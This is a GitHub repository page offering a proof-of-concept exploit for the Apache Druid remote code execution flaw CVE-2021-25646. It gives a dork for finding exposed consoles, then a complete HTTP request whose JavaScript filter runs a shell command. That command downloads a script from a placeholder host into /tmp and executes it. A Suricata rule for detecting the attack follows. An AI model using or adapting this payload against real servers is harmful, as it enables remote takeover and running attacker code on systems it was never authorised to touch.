Skip to content

lp008/CVE-2021-25646

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

4 Commits
 
 

Repository files navigation

Apache Druid RCE

title="druid" && title=="Apache Druid"

POST /druid/indexer/v1/sampler?for=filter HTTP/1.1

Host: x.x.x.x:8888

Content-Length: 612

Accept: application/json, text/plain, /

Origin: http://x.x.x.x:8888

User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.87 Safari/537.36 SE 2.X MetaSr 1.0

Content-Type: application/json;charset=UTF-8

Referer: http://x.x.x.x:8888/unified-console.html

Accept-Language: zh-CN,zh;q=0.9

Connection: close

{"type":"index","spec":{"ioConfig":{"type":"index","firehose":{"type":"local","baseDir":"quickstart/tutorial/","filter":"wikiticker-2015-09-12-sampled.json.gz"}},"dataSchema":{"dataSource":"sample","parser":{"type":"string","parseSpec":{"format":"json","timestampSpec":{"column":"time","format":"iso"},"dimensionsSpec":{}}},"transformSpec":{"transforms":[],"filter":{"type":"javascript", "function":"function(value){return java.lang.Runtime.getRuntime().exec('wget http://x.x.x.x/1.txt -O /tmp/1.sh && sh /tmp/1.sh')}", "dimension":"added", "":{ "enabled":"true" } }}}},"samplerConfig":{"numRows":500,"cacheKey":"73a90acaae2b1ccc0e969709665bc62f"}}

Detection rules

alert http any any -> any any (msg:"ET EXPLOIT CVE-2021-25646 Apache Druid RCE POST"; flow:established,to_server; content:"POST"; http_method;content:"/druid/indexer/v1/sampler?for=filter"; http_uri; content:"java.lang.Runtime.getRuntime().exec(";http_client_body; nocase; reference:url,mp.weixin.qq.com/s/Eny6AnFarvvpjeEJNMfTrw; reference:cve,2021-25646; classtype:web-application-attack; sid:2031533; rev:2; metadata:affected_product Web_Server_Applications, created_at 2021_02_03, cve CVE_2021_25646, former_category EXPLOIT, signature_severity Major, updated_at 2021_02_03;)

About

No description, website, or topics provided.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published